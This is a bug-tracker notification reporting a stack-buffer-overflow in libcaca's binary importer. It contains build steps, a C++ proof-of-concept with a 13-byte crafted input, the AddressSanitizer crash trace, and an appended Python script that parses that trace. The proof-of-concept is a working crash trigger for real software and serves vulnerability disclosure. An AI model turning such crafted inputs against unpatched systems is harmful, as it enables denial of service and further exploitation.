** Bug watch added: github.com/cacalabs/libcaca/issues #56
   https://github.com/cacalabs/libcaca/issues/56

** Also affects: libcaca via
   https://github.com/cacalabs/libcaca/issues/56
   Importance: Unknown
       Status: Unknown

** Changed in: libcaca (Ubuntu)
       Status: New => Triaged

https://bugs.launchpad.net/bugs/1925468

Title:
  stack-buffer-overflow of import.c in function _import_bin

Status in libcaca:
  Unknown
Status in libcaca package in Ubuntu:
  Triaged

Bug description:
  Hello Ubuntu security team

  issues: https://github.com/cacalabs/libcaca/issues/56

  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1
  libcaca version e4968ba

  Verification steps:
  1. Get the source code of libcaca
  2. Compile the libcaca.so library

  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make

  or

  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb"
  $ make

  3. Create the poc_bin.cc && build

  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include <assert.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <fstream>
  #include <iostream>

  using namespace std;

  void crash(const uint8_t *Data, size_t Size) {

    if(Size<8) return ;
    size_t len=0;
    caca_canvas_t *cv;
    cv = caca_create_canvas(0,0);
    caca_create_frame(cv,0);
    caca_set_frame(cv,0);
    caca_import_canvas_from_memory(cv,Data,Size,"bin"); // ASan reports the read inside this call (_import_bin, import.c:425)
    caca_free_canvas(cv);
    cv=NULL;

  }


  int main(int args,char* argv[]){

          size_t len = 0;
          unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47}; // 13-byte input
          len = sizeof(buffer)/sizeof(unsigned char);
          printf("%zu\n",sizeof(buffer)/sizeof(unsigned char)); // %zu: sizeof yields size_t
          crash((const uint8_t*)buffer,len);

          return 0;
  }

  4. Compile poc_bin.cc

  clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address \
      -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin

  5. Run poc_bin

  asan info:

  =================================================================
  ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
  READ of size 1 at 0x7ffe7cd3774d thread T0
      #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33
      #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3
      #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
      #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
      #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)

  Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
      #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

    This frame has 1 object(s):
      [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable
  HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
        (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
  Shadow bytes around the buggy address:
    0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
    0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  Shadow byte legend (one shadow byte represents 8 application bytes):
    Addressable:           00
    Partially addressable: 01 02 03 04 05 06 07
    Heap left redzone:       fa
    Freed heap region:       fd
    Stack left redzone:      f1
    Stack mid redzone:       f2
    Stack right redzone:     f3
    Stack after return:      f5
    Stack use after scope:   f8
    Global redzone:          f9
    Global init order:       f6
    Poisoned by user:        f7
    Container overflow:      fc
    Array cookie:            ac
    Intra object redzone:    bb
    ASan internal:           fe
    Left alloca redzone:     ca
    Right alloca redzone:    cb
    Shadow gap:              cc
  ==3817476==ABORTING

  Thanks
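
Reading the AddressSanitizer report above mechanically, as an added example that is not part of the original bug report or of libcaca: the script extracts the access, the overflowed frame object and the bracketed shadow byte, and checks that they agree. The names `triage` and `REPORT`, the five-line sample (copied from the report) and the shadow offset 0x7fff8000 (the ASan default on Linux x86_64) are assumptions.

```python
import re

# Constructed sample: five lines copied from the ASan report above, one per line.
REPORT = """\
==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
READ of size 1 at 0x7ffe7cd3774d thread T0
Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
    [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable
=>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
"""

# Assumption: default ASan shadow mapping on Linux x86_64, shadow = (addr >> 3) + offset.
SHADOW_OFFSET = 0x7FFF8000


def triage(report):
    """Summarise an ASan stack-buffer-overflow report as a dict."""
    kind, size, addr = re.search(
        r"(READ|WRITE) of size (\d+) at (0x[0-9a-f]+)", report).groups()
    size, addr = int(size), int(addr, 16)
    offset = int(re.search(r"at offset (\d+) in frame", report).group(1))

    # Frame objects are half-open ranges "[start, end) 'name'"; take the one
    # whose bounds lie closest to the faulting frame offset.
    objs = [(int(s), int(e), n)
            for s, e, n in re.findall(r"\[(\d+), (\d+)\) '([^']+)'", report)]
    start, end, name = min(
        objs, key=lambda o: min(abs(offset - o[0]), abs(offset - o[1])))

    # Shadow row "=>0xROW: .. ..[kk].. ..": the bracketed byte describes the
    # 8-byte granule that contains the faulting address.
    row, cells = re.search(r"=>(0x[0-9a-f]+): (.*)", report).groups()
    before = re.findall(r"[0-9a-f]{2}", cells[:cells.index("[")])
    shadow_addr = int(row, 16) + len(before)
    shadow_val = int(cells[cells.index("[") + 1:cells.index("]")], 16)

    return {
        "access": f"{kind} of {size} byte(s)",
        "object": name,
        "object_size": end - start,
        "bytes_past_end": offset + size - end,  # > 0: overrun to the right
        "shadow_matches": shadow_addr == (addr >> 3) + SHADOW_OFFSET,
        # Shadow value k in 1..7: only the first k bytes of the granule are valid.
        "first_invalid_byte": 0 < shadow_val < 8 and (addr & 7) == shadow_val,
    }


if __name__ == "__main__":
    print(triage(REPORT))
```

For this report the result is a 1-byte read landing on the first byte after the 13-byte `buffer`, which is the whole PoC input handed to the importer.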